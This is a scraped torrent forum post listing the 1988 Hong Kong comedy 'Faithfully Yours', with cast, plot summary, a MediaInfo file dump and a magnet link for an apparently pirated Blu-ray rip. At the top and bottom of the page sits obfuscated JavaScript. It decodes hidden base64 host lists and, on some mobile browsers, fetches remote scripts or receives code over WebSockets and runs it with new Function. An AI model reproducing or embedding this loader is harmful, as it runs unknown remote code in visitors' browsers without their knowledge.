最佳女婿[国粤语配音/中文字幕].Faithfully.Yours.1988.1080p.BluRay.x265.10bit.DTS.2Audio 6.05GB

版主小s 22天前 214

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 最佳女婿 / Faithfully Yours

◎年 代 1988

◎产 地 中国香港

◎类 别 喜剧

◎语 言 粤语

◎上映日期 1988-12-17(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0121922/

◎豆瓣评分 6.6/10 (24519人评价)

◎豆瓣链接 https://movie.douban.com/subject/1400666/

◎片 长 88分钟

◎导 演 黄华麒 Wah-Kei Wong (id:1345410)

◎编 剧 张海兴 Hoi-ying Cheung (id:1406103)

◎演 员 张学友 Jacky Cheung (id:1012563)

周星驰 Stephen Chow (id:1048026)

莫少聪 Siu Chung Mok (id:1037846)

张敏 Sharla Cheung (id:1005297)

吴耀汉 Richard Ng (id:1037408)

沈殿霞 Lydia Shum (id:1159493)

梁荣忠 Wing-Chung Leung (id:1315034)

胡枫 Fung Woo (id:1313733)

廖启智 Kai Chi Liu (id:1274268)

郑欣宜 Joyce Cheng (id:1007512)

叶荣祖 Wing-Cho Yip (id:1314277)

刘鸿泉 Hung Chuen Lau (id:1318709)

◎标 签 周星驰 / 喜剧 / 香港 / 张学友 / 香港电影 / 莫少聪 / 1988 / 张敏

◎简 介

美发师纪阿开(张学友)、服装设计师大眼龙(莫少聪)和风水师赖布丁(周星驰)三个死党合伙开了一家新潮美发店,不料开业当天就与隔壁理发店老板发生争执,幸得店老板女儿亚英(张敏)及时出手风波平息,过程中,三人皆被亚英魅力吸引,为赢其芳心,开始频频登其家门献殷勤。

某次晚餐聚会后,三人烂醉与亚英误睡一室,导致亚英怀孕,为与亚英一起生活,三人争先恐后将准父亲一职往自己身上揽,又因三人血型相同,医院也无法验出谁在冒名,亚英父母决定先考察三人表现,为争当最佳女婿,三人使尽浑身解数展开激烈角逐。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 319999749856186592298875729963653351181 (0xF0BDB5C579080E16356CFE18C121470D)

  4. Complete name : [email protected]BQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.05 GiB

  8. Duration : 1 h 31 min

  9. Overall bit rate : 9 481 kb/s

  10. Movie name : Faithfully Yours

  11. Encoded date : UTC 2021-11-08 03:50:07

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 31 min

  23. Bit rate : 6 418 kb/s

  24. Width : 1 916 pixels

  25. Height : 1 080 pixels

  26. Display aspect ratio : 16:9

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.129

  33. Stream size : 4.10 GiB (68%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=20.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio #1

  39. ID : 2

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 1 h 31 min

  44. Bit rate mode : Constant

  45. Bit rate : 1 510 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossy

  52. Stream size : 987 MiB (16%)

  53. Title : Cantonese

  54. Language : Chinese

  55. Default : Yes

  56. Forced : No


  57. Audio #2

  58. ID : 3

  59. Format : DTS

  60. Format/Info : Digital Theater Systems

  61. Codec ID : A_DTS

  62. Duration : 1 h 31 min

  63. Bit rate mode : Constant

  64. Bit rate : 1 510 kb/s

  65. Channel(s) : 6 channels

  66. Channel layout : C L R Ls Rs LFE

  67. Sampling rate : 48.0 kHz

  68. Frame rate : 93.750 FPS (512 SPF)

  69. Bit depth : 24 bits

  70. Compression mode : Lossy

  71. Stream size : 987 MiB (16%)

  72. Title : Mandarin

  73. Language : Chinese

  74. Default : No

  75. Forced : No


  76. Text #1

  77. ID : 4

  78. ID in the original source medium : 4609 (0x1201)

  79. Format : PGS

  80. Muxing mode : zlib

  81. Codec ID : S_HDMV/PGS

  82. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration : 1 h 28 min

  84. Bit rate : 37.6 kb/s

  85. Count of elements : 2503

  86. Stream size : 23.8 MiB (0%)

  87. Title : chs

  88. Language : Chinese

  89. Default : Yes

  90. Forced : No

  91. Original source medium : Blu-ray


  92. Text #2

  93. ID : 5

  94. ID in the original source medium : 4608 (0x1200)

  95. Format : PGS

  96. Muxing mode : zlib

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 28 min

  100. Bit rate : 38.5 kb/s

  101. Count of elements : 2503

  102. Stream size : 24.4 MiB (0%)

  103. Title : cht

  104. Language : Chinese

  105. Default : No

  106. Forced : No

  107. Original source medium : Blu-ray


  108. Text #3

  109. ID : 6

  110. ID in the original source medium : 4610 (0x1202)

  111. Format : PGS

  112. Muxing mode : zlib

  113. Codec ID : S_HDMV/PGS

  114. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  115. Duration : 1 h 28 min

  116. Bit rate : 41.0 kb/s

  117. Count of elements : 2503

  118. Stream size : 25.9 MiB (0%)

  119. Title : eng

  120. Language : English

  121. Default : No

  122. Forced : No

  123. Original source medium : Blu-ray


  124. Menu

  125. 00:00:00.000 : en:Chapter 01

  126. 00:08:43.375 : en:Chapter 02

  127. 00:15:35.458 : en:Chapter 03

  128. 00:21:36.166 : en:Chapter 04

  129. 00:27:28.291 : en:Chapter 05

  130. 00:37:13.416 : en:Chapter 06

  131. 00:43:22.708 : en:Chapter 07

  132. 00:53:27.041 : en:Chapter 08

  133. 01:01:46.750 : en:Chapter 09

  134. 01:09:56.125 : en:Chapter 10

  135. 01:16:45.458 : en:Chapter 11

  136. 01:24:19.583 : en:Chapter 12


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:A467EBC1B367CBD449E53E82DB6677002F7314F3

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};